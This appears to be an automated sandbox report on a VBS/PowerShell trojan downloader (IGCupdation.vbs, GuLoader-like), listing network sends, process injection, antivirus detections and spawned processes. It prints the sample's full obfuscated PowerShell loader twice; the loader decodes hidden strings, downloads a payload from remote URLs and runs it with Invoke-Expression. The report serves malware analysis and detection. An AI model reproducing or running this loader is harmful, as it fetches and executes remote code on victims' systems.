send Aug. 30, 2024, 6:08 p.m.	buffer: sofÑÁ×¿ý-Ay<DáÚÙqï¹§ÊëÞü½.5/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1332 sent: 120	1	120
send Aug. 30, 2024, 6:08 p.m.	buffer: kgfÑ"o¸Àµ¢K<ÚâPwÔ]ÒtÆ'_Â/5 ÀÀÀ À 28&ÿ jahez.me socket: 1332 sent: 112	1	112
send Aug. 30, 2024, 6:08 p.m.	buffer: kgfÑ#«ÐK >Ûû£¡ëßª6*á'-R¸NN/5 ÀÀÀ À 28&ÿ jahez.me socket: 1332 sent: 112	1	112
send Aug. 30, 2024, 6:08 p.m.	buffer: sofÑ'gL&´ÝiohÆÖþ(7F\-Å!Ò/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1332 sent: 120	1	120
send Aug. 30, 2024, 6:08 p.m.	buffer: sofÑ(<ù(¥×À´= Ô%ûû(Tq¦äÛ¢/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1332 sent: 120	1	120
send Aug. 30, 2024, 6:09 p.m.	buffer: kgfÑ,Kú@ È§zÊÇª=#ÇÍþXq? ÿ/5 ÀÀÀ À 28&ÿ jahez.me socket: 1332 sent: 112	1	112

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fristadens.Til && echo t"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Standardfradrags='SUBsTR';$Distriktslgernes157++;}$Standardfradrags+='ing';Function Bandolojrer($Fjordene){$Dizz=$Fjordene.Length-$Distriktslgernes157;For( $Udrringen=4;$Udrringen -lt $Dizz;$Udrringen+=5){$Reflexologically+=$Fjordene.$Standardfradrags.'Invoke'( $Udrringen, $Distriktslgernes157);}$Reflexologically;}function Bardling($Udrringennoppugnable){ & ($Anacoluthon) ($Udrringennoppugnable);}$Whished=Bandolojrer 'ProvMEbe.oKrysz,erviSnekl undlLykkaServ/ Svi5 Lam. Vo.0Al,o Nat(R ffW ,mfitrann .erdHo doSilvwWe gsPhyl DrumN BesT A.p A,be1Ant,0Unse. Und0Lear;Bogd ProgWPizziRejnnOve.6Pala4 Non;T.ls Drvox.rdi6Korr4Inte; Uni BendrGammv Sk :Tan,1Csiu2 C.o1 Hel.Par.0 Per)Side Pro.G SyneTachcrevekRibboBort/ An 2Ulse0Slag1Sika0unex0 Bib1 Fla0In,e1Ops. TriFKv.riWorsrKonge Pref ieno MurxR fu/Bavn1Axel2Sui 1Zard.Form0magt ';$Bgehjes=Bandolojrer 'hertUannesKerfeUnasrI.va-AuxoABra gFreeeAutonFrertG ov ';$Tipstaves=Bandolojrer ' ,oph BantSoutt NedpConcsWich:Gala/ tu /Cytot.kilrEnani Undc.nvioCotttEndeeRevexNo,abSensaCo ecSpruaAna,u Rev.E emr Pluoterg/ ovewVa,cp.ria-UndeiPa on Ly,cRaadlDehyu.oerdExtee R,asCret/Enhei eqmAchrgSode/CockN O eoBaden.obbd misiInatsvi tcP.efoTy,inRegrt opni AuknstaduSilvaGraanDemocWindetail.FilmmBry,iSarcxStra>Fo.dhMetatPleatTakkpCrims Bej: Ta./Expa/ s,bjEeteaBandhHouse espz f e.KunsmrenteUlno/De tfUn,hoSwinnSymptRefo/HypoN H,soUdlenAfmad PyriIntes,ntacFul oUdvan ithtLysaiH,lmnSe vuShaaaIndtn ReucMo ie Phr.GranmApari O exPisc ';$Plumaceous=Bandolojrer 'Conf> Com ';$Anacoluthon=Bandolojrer ',agfiArkaeKu.sxacqu ';$Dichlorohydrin='Chalon';$Baalets = Bandolojrer 'Anvae Medc KulhStatoIndb I d%ShanaK,rnpPuddpp.std,yveaUnest,rdia Di,%.lay\FortF TabrKno,iH,rksTax tbuldaDeledTyn.ecalvnUnmesTrsk.quotTPr diMyndlMisd .rok&Grov&Ho t AlgoeAf ycSulphMineoAtti ,oolt Hem ';Bardling (Bandolojrer 'Nuan$Gra.gTu il andobespbBedwa Do.lUn a:MultPPse.l UdtaluddsMislt,tahi St cUns.aFimbl aclFe dyO de=Grun(Ti tc.antm irddent N z/natic Sty Tin$TilbB Afba Ro,aCryblTeeteprobtKn.fs Lou) Pen ');Bardling (Bandolojrer 'Vent$Se rgMargl ,avoKetcb,ejlaPantlBind: ettU lad UndeBa lb VelastatnL,edeWindr Sufsarth=Ant $D.etTbrieiUdslpG,nosslumtStttaFairv blae.ndrs,ver.AdensSip.p adelTypoiGr.et Bl,(Phal$ owPBrnel B nuG atmUnhaaSnigcarbeeUnhuoUn uuAd,asSpa ) ,al ');Bardling (Bandolojrer 'S,er[GodtN ThyeVer.tOutp. Ko.SStyreJulerskogv LeniovercdesieEur PSup oIndeiPontnAfdatglanMLongaDonknDruiaRubbg,enheSonnr rl] Mis:Okku:,rchSLan.eKoorcTootuSegurBombiSteit LakyBetnPSignr CraoantitKundo WilcSp.uoNonrlle,e Tryk= Den The.[RegiNMarmebas.t Ben. HidS smeSuggcR,nguF.rsr Pr.iRecotStudyFl vPBallrPrero PretKnysoPythc,aktoTeksl merTOveryLourpdobbeSki ]Da e: Sko: tyvTPhotlA,ilsP an1Quot2 ple ');$Tipstaves=$Udebaners[0];$Overfladetemperatur= (Bandolojrer 'Unal$ AmpgC,ealCi foBiblb empaPatelWeav:TjurHCentaT rel Co,lInflmOveraYderr ardkM.rt=,tepNPulaeWeapwTypi-Fr,dO ,gnb erijski,eA.rec rektAn,b PistSFro yNorms OvetInveeTchamSmld.DeleNunmieHilltcloi. ,ieWly feTa,eb be,CUncol MasiGas.eBenznSk et');$Overfladetemperatur+=$Plastically[1];Bardling ($Overfladetemperatur);Bardling (Bandolojrer 'Pek $klitHMoelaG nel,ubdlKom,mMiljaPokarOxysk urm.AfteHOpiuevi.taTangdAutoeCr nr ScasSy.k[Plas$Sk,iBM,thgFljte OtohTedejBi.deAfrisAgte]Ul k=,nde$ FicWAdrehVitri M,ssSlukhT,ljeBoomdImpe ');$kongelovens=Bandolojrer 'Kont$CentHdokua,hecl .trlSoakmSlikaD,slr Ichk Kli.enneDCe eoTr.ywWie,nMarslFi,ko Ma,aOppodNyheF A giSejllMesoeF,lm(D,ne$SkolTV,ndiProvpT.ylsteest TabaOvervcafeeGiftsNavn,Arab$PapiY ud oInfou FlatGelahTildeHvornFremiUndenHas.gMilj) Geo ';$Youthening=$Plastically[0];Bardling (Bandolojrer 'Rund$ Ad.gNipplMiseoUnd,bvenuaDecilChai:SwamSIn,ieUr.cm,ndeu SollTriajSp.meVaabg BesrDunay.algnSlage Uset halsRack=Ski (outpTFeriePhylsT betUnde-GydePKresaMus,tSynkhEi s For$DisiY A.ao.rmmu AnttsparhGue.eWomanMegaiValsnFra,g Ban)Gaar ');while (!$Semuljegrynets) {Bardling (Bandolojrer 'E,to$NonegAl alKlagoFantbBegna TotlCour:Mun,KPlacaosmutFo ueOve,dEnf rDumpa S.pl Fi.eWaitrTanksSamt=Coke$SupptHva rToddu Ka,eUpaa ') ;Bardling $kongelovens;Bardling (Bandolojrer 'sad,S H.ptCangaKr erFa mtUrs.-Eva STen lWalleChokeLdetpSal. O.er4 .ag ');Bardling (Bandolojrer 'Type$,ndhg Basl HovoMentbRej,aHofmlEduc: ProSvel.eLogom Creu H nl E,gjCi,ree hegDoupr,agsyFsfinAradeBygntAnassTow,= Xyl(UndeT,usme BansFiret Fel-BanaPHst a.rstt verh Thy Mus$B,lgY ,nhoSpiruIndhtI anhW,deeA,isnDecai A snFiengEssa)Supe ') ;Bardling (Bandolojrer 'Unt,$isedgT.dil,awmoIndibovera CyclProd:pe,fSMetat,muto,ydsp ,aif DupoWormdAkt.rI,teeU.udrUnde=Reno$BidsgJinsl Cado BoibGrima ,axlNiss:GromN Toto,ridnElumkbunknDelso Rivw.apalUnspeKik.dCan g .aveAn n+Meta+ Sig%Prec$BillUTr.ndHundeAlbabkam a AnknUntreNo.orSpejs Ast. ShacSatsoGarguTraunFilttma k ') ;$Tipstaves=$Udebaners[$Stopfodrer];}$Plenitude=315632;$Afprvningsprocedurerne=28053;Bardling (Bandolojrer 'Sats$Bor gMovilNib oUn bb ewsaKurtlprot:EtvrPOnflaHovedUndidVoodoevenc GerkForesPreltAnicoz,xno MrklUran2,nst4B,nv9Mot. .ekt= Min FraGDesse,rbet,uri-Udb,C R lo Sunn Endt rodeAbeanK,yetEvne V,p$ daYKebboB ffuQuartDenthFor.eDullnP ntiAbolnLeksgEave ');Bardling (Bandolojrer ' .je$anthgAno l hoto Ar.bEl,saSherlSemi:DataSSkibhHum,a L.nn M,tgFas,a jelFri l ,jeaDefl5 nde1 esa Sciu= Tra Lap.[MackS Fory.ulmsKya,tAireeVan,mPom . WooCNe.ro.hetnProvvInsueAplarV,nstMani] Lon:b om:WateF,einr OrdoFarvmrollBSemiaFirnsCan,e Cac6Af,e4,uleSAlpetSubjr.atai UndnLonng si,(Blod$ForuPFabeaDemadPaa,d WaioBekocDamakU cos .yntUd,uoGid oco plStep2 alt4ra l9Cata)dian ');Bardling (Bandolojrer ' Dia$benegReasl Nono Scib .ftaAffelel,v:AccoPDaarrGeneeGenniCal nH,pssCobwuHydrlSatiaOverrReca Seri=Len. ,ont[AttaSavisyKlagsb attChewe Talm .ra.TndeT R,geUsoix Ma,tStem. utsEJuarn TilcS oroElitdSpiliTalsnFi egDrui]Win :Nonr:Bra.AWhirSHellCMoroI DesI Sam.ExodGtidseRedit HanSIngetC.eprMaali.ensn UndgLew (Avis$ FreSA.cohUmboaU vinSteggChonaSpirl AlblK,mmapenn5Jobb1Spic)Outs ');Bardling (Bandolojrer 'le,l$ ,iggDelilKegsoRattbDemia .arl ic:,olkP orsr Bi oPartfTilbu Syrs MaiiNumioSk pnGen,=Pall$aarsP armrEpiteOveriKo tnBetasExocu upelLuncaInderSprn.AvulsTr nu LanbOversPrintArbernegli.yrenAng gEnte(Hjem$HittPPontlPubleBan.nMopsiHistt TaluForfdSchieUfor,Pers$gaveATitafStbepStifr sp,vold,n ZoniHuthn.gtegUerhsHa npSt dr c coParacPenteSkovd kvau Kilr.orseLattrP.elnEnraeDo,b).elt ');Bardling $Profusion;"
parent_process	wscript.exe	martian_process	POWERSHELL "If (${host}.CurrentUICulture) {$Standardfradrags='SUBsTR';$Distriktslgernes157++;}$Standardfradrags+='ing';Function Bandolojrer($Fjordene){$Dizz=$Fjordene.Length-$Distriktslgernes157;For( $Udrringen=4;$Udrringen -lt $Dizz;$Udrringen+=5){$Reflexologically+=$Fjordene.$Standardfradrags.'Invoke'( $Udrringen, $Distriktslgernes157);}$Reflexologically;}function Bardling($Udrringennoppugnable){ & ($Anacoluthon) ($Udrringennoppugnable);}$Whished=Bandolojrer 'ProvMEbe.oKrysz,erviSnekl undlLykkaServ/ Svi5 Lam. Vo.0Al,o Nat(R ffW ,mfitrann .erdHo doSilvwWe gsPhyl DrumN BesT A.p A,be1Ant,0Unse. Und0Lear;Bogd ProgWPizziRejnnOve.6Pala4 Non;T.ls Drvox.rdi6Korr4Inte; Uni BendrGammv Sk :Tan,1Csiu2 C.o1 Hel.Par.0 Per)Side Pro.G SyneTachcrevekRibboBort/ An 2Ulse0Slag1Sika0unex0 Bib1 Fla0In,e1Ops. TriFKv.riWorsrKonge Pref ieno MurxR fu/Bavn1Axel2Sui 1Zard.Form0magt ';$Bgehjes=Bandolojrer 'hertUannesKerfeUnasrI.va-AuxoABra gFreeeAutonFrertG ov ';$Tipstaves=Bandolojrer ' ,oph BantSoutt NedpConcsWich:Gala/ tu /Cytot.kilrEnani Undc.nvioCotttEndeeRevexNo,abSensaCo ecSpruaAna,u Rev.E emr Pluoterg/ ovewVa,cp.ria-UndeiPa on Ly,cRaadlDehyu.oerdExtee R,asCret/Enhei eqmAchrgSode/CockN O eoBaden.obbd misiInatsvi tcP.efoTy,inRegrt opni AuknstaduSilvaGraanDemocWindetail.FilmmBry,iSarcxStra>Fo.dhMetatPleatTakkpCrims Bej: Ta./Expa/ s,bjEeteaBandhHouse espz f e.KunsmrenteUlno/De tfUn,hoSwinnSymptRefo/HypoN H,soUdlenAfmad PyriIntes,ntacFul oUdvan ithtLysaiH,lmnSe vuShaaaIndtn ReucMo ie Phr.GranmApari O exPisc ';$Plumaceous=Bandolojrer 'Conf> Com ';$Anacoluthon=Bandolojrer ',agfiArkaeKu.sxacqu ';$Dichlorohydrin='Chalon';$Baalets = Bandolojrer 'Anvae Medc KulhStatoIndb I d%ShanaK,rnpPuddpp.std,yveaUnest,rdia Di,%.lay\FortF TabrKno,iH,rksTax tbuldaDeledTyn.ecalvnUnmesTrsk.quotTPr diMyndlMisd .rok&Grov&Ho t AlgoeAf ycSulphMineoAtti ,oolt Hem ';Bardling (Bandolojrer 'Nuan$Gra.gTu il andobespbBedwa Do.lUn a:MultPPse.l UdtaluddsMislt,tahi St cUns.aFimbl aclFe dyO de=Grun(Ti tc.antm irddent N z/natic Sty Tin$TilbB Afba Ro,aCryblTeeteprobtKn.fs Lou) Pen ');Bardling (Bandolojrer 'Vent$Se rgMargl ,avoKetcb,ejlaPantlBind: ettU lad UndeBa lb VelastatnL,edeWindr Sufsarth=Ant $D.etTbrieiUdslpG,nosslumtStttaFairv blae.ndrs,ver.AdensSip.p adelTypoiGr.et Bl,(Phal$ owPBrnel B nuG atmUnhaaSnigcarbeeUnhuoUn uuAd,asSpa ) ,al ');Bardling (Bandolojrer 'S,er[GodtN ThyeVer.tOutp. Ko.SStyreJulerskogv LeniovercdesieEur PSup oIndeiPontnAfdatglanMLongaDonknDruiaRubbg,enheSonnr rl] Mis:Okku:,rchSLan.eKoorcTootuSegurBombiSteit LakyBetnPSignr CraoantitKundo WilcSp.uoNonrlle,e Tryk= Den The.[RegiNMarmebas.t Ben. HidS smeSuggcR,nguF.rsr Pr.iRecotStudyFl vPBallrPrero PretKnysoPythc,aktoTeksl merTOveryLourpdobbeSki ]Da e: Sko: tyvTPhotlA,ilsP an1Quot2 ple ');$Tipstaves=$Udebaners[0];$Overfladetemperatur= (Bandolojrer 'Unal$ AmpgC,ealCi foBiblb empaPatelWeav:TjurHCentaT rel Co,lInflmOveraYderr ardkM.rt=,tepNPulaeWeapwTypi-Fr,dO ,gnb erijski,eA.rec rektAn,b PistSFro yNorms OvetInveeTchamSmld.DeleNunmieHilltcloi. ,ieWly feTa,eb be,CUncol MasiGas.eBenznSk et');$Overfladetemperatur+=$Plastically[1];Bardling ($Overfladetemperatur);Bardling (Bandolojrer 'Pek $klitHMoelaG nel,ubdlKom,mMiljaPokarOxysk urm.AfteHOpiuevi.taTangdAutoeCr nr ScasSy.k[Plas$Sk,iBM,thgFljte OtohTedejBi.deAfrisAgte]Ul k=,nde$ FicWAdrehVitri M,ssSlukhT,ljeBoomdImpe ');$kongelovens=Bandolojrer 'Kont$CentHdokua,hecl .trlSoakmSlikaD,slr Ichk Kli.enneDCe eoTr.ywWie,nMarslFi,ko Ma,aOppodNyheF A giSejllMesoeF,lm(D,ne$SkolTV,ndiProvpT.ylsteest TabaOvervcafeeGiftsNavn,Arab$PapiY ud oInfou FlatGelahTildeHvornFremiUndenHas.gMilj) Geo ';$Youthening=$Plastically[0];Bardling (Bandolojrer 'Rund$ Ad.gNipplMiseoUnd,bvenuaDecilChai:SwamSIn,ieUr.cm,ndeu SollTriajSp.meVaabg BesrDunay.algnSlage Uset halsRack=Ski (outpTFeriePhylsT betUnde-GydePKresaMus,tSynkhEi s For$DisiY A.ao.rmmu AnttsparhGue.eWomanMegaiValsnFra,g Ban)Gaar ');while (!$Semuljegrynets) {Bardling (Bandolojrer 'E,to$NonegAl alKlagoFantbBegna TotlCour:Mun,KPlacaosmutFo ueOve,dEnf rDumpa S.pl Fi.eWaitrTanksSamt=Coke$SupptHva rToddu Ka,eUpaa ') ;Bardling $kongelovens;Bardling (Bandolojrer 'sad,S H.ptCangaKr erFa mtUrs.-Eva STen lWalleChokeLdetpSal. O.er4 .ag ');Bardling (Bandolojrer 'Type$,ndhg Basl HovoMentbRej,aHofmlEduc: ProSvel.eLogom Creu H nl E,gjCi,ree hegDoupr,agsyFsfinAradeBygntAnassTow,= Xyl(UndeT,usme BansFiret Fel-BanaPHst a.rstt verh Thy Mus$B,lgY ,nhoSpiruIndhtI anhW,deeA,isnDecai A snFiengEssa)Supe ') ;Bardling (Bandolojrer 'Unt,$isedgT.dil,awmoIndibovera CyclProd:pe,fSMetat,muto,ydsp ,aif DupoWormdAkt.rI,teeU.udrUnde=Reno$BidsgJinsl Cado BoibGrima ,axlNiss:GromN Toto,ridnElumkbunknDelso Rivw.apalUnspeKik.dCan g .aveAn n+Meta+ Sig%Prec$BillUTr.ndHundeAlbabkam a AnknUntreNo.orSpejs Ast. ShacSatsoGarguTraunFilttma k ') ;$Tipstaves=$Udebaners[$Stopfodrer];}$Plenitude=315632;$Afprvningsprocedurerne=28053;Bardling (Bandolojrer 'Sats$Bor gMovilNib oUn bb ewsaKurtlprot:EtvrPOnflaHovedUndidVoodoevenc GerkForesPreltAnicoz,xno MrklUran2,nst4B,nv9Mot. .ekt= Min FraGDesse,rbet,uri-Udb,C R lo Sunn Endt rodeAbeanK,yetEvne V,p$ daYKebboB ffuQuartDenthFor.eDullnP ntiAbolnLeksgEave ');Bardling (Bandolojrer ' .je$anthgAno l hoto Ar.bEl,saSherlSemi:DataSSkibhHum,a L.nn M,tgFas,a jelFri l ,jeaDefl5 nde1 esa Sciu= Tra Lap.[MackS Fory.ulmsKya,tAireeVan,mPom . WooCNe.ro.hetnProvvInsueAplarV,nstMani] Lon:b om:WateF,einr OrdoFarvmrollBSemiaFirnsCan,e Cac6Af,e4,uleSAlpetSubjr.atai UndnLonng si,(Blod$ForuPFabeaDemadPaa,d WaioBekocDamakU cos .yntUd,uoGid oco plStep2 alt4ra l9Cata)dian ');Bardling (Bandolojrer ' Dia$benegReasl Nono Scib .ftaAffelel,v:AccoPDaarrGeneeGenniCal nH,pssCobwuHydrlSatiaOverrReca Seri=Len. ,ont[AttaSavisyKlagsb attChewe Talm .ra.TndeT R,geUsoix Ma,tStem. utsEJuarn TilcS oroElitdSpiliTalsnFi egDrui]Win :Nonr:Bra.AWhirSHellCMoroI DesI Sam.ExodGtidseRedit HanSIngetC.eprMaali.ensn UndgLew (Avis$ FreSA.cohUmboaU vinSteggChonaSpirl AlblK,mmapenn5Jobb1Spic)Outs ');Bardling (Bandolojrer 'le,l$ ,iggDelilKegsoRattbDemia .arl ic:,olkP orsr Bi oPartfTilbu Syrs MaiiNumioSk pnGen,=Pall$aarsP armrEpiteOveriKo tnBetasExocu upelLuncaInderSprn.AvulsTr nu LanbOversPrintArbernegli.yrenAng gEnte(Hjem$HittPPontlPubleBan.nMopsiHistt TaluForfdSchieUfor,Pers$gaveATitafStbepStifr sp,vold,n ZoniHuthn.gtegUerhsHa npSt dr c coParacPenteSkovd kvau Kilr.orseLattrP.elnEnraeDo,b).elt ');Bardling $Profusion;"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2548 resumed a thread in remote process 2768
NtResumeThread Aug. 30, 2024, 6:07 p.m.	thread_handle: 0x000004ac suspend_count: 1 process_identifier: 2768	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline

File has been identified by 24 AntiVirus engines on VirusTotal as malicious (24 events)

Arcabit	Trojan.Generic.D46858EF
ESET-NOD32	PowerShell/TrojanDownloader.Agent.JEH
TrendMicro-HouseCall	TROJ_GEN.F04IE00HS24
Avast	Script:SNH-gen [Drp]
Kaspersky	HEUR:Trojan.VBS.SAgent.gen
BitDefender	Trojan.GenericKD.73947375
MicroWorld-eScan	Trojan.GenericKD.73947375
Emsisoft	Trojan.GenericKD.73947375 (B)
DrWeb	VBS.DownLoader.3352
TrendMicro	TROJ_GEN.F04IE00HS24
FireEye	Trojan.GenericKD.73947375
Ikarus	Trojan-Downloader.PowerShell.Agent
Google	Detected
Avira	VBS/avi.Agent.598a02
MAX	malware (ai score=88)
Microsoft	Trojan:Win32/Leonem
ZoneAlarm	HEUR:Trojan.VBS.SAgent.gen
GData	Trojan.GenericKD.73947375
Varist	VBS/Agent.BPS
AhnLab-V3	Downloader/VBS.Powershell
Yandex	Trojan.Vabser.b2Tshf.30
huorong	Trojan/VBS.GuLoader.m
Fortinet	VBS/Agent.JEH!tr
AVG	Script:SNH-gen [Drp]

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\cmd.exe

IGCupdation.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All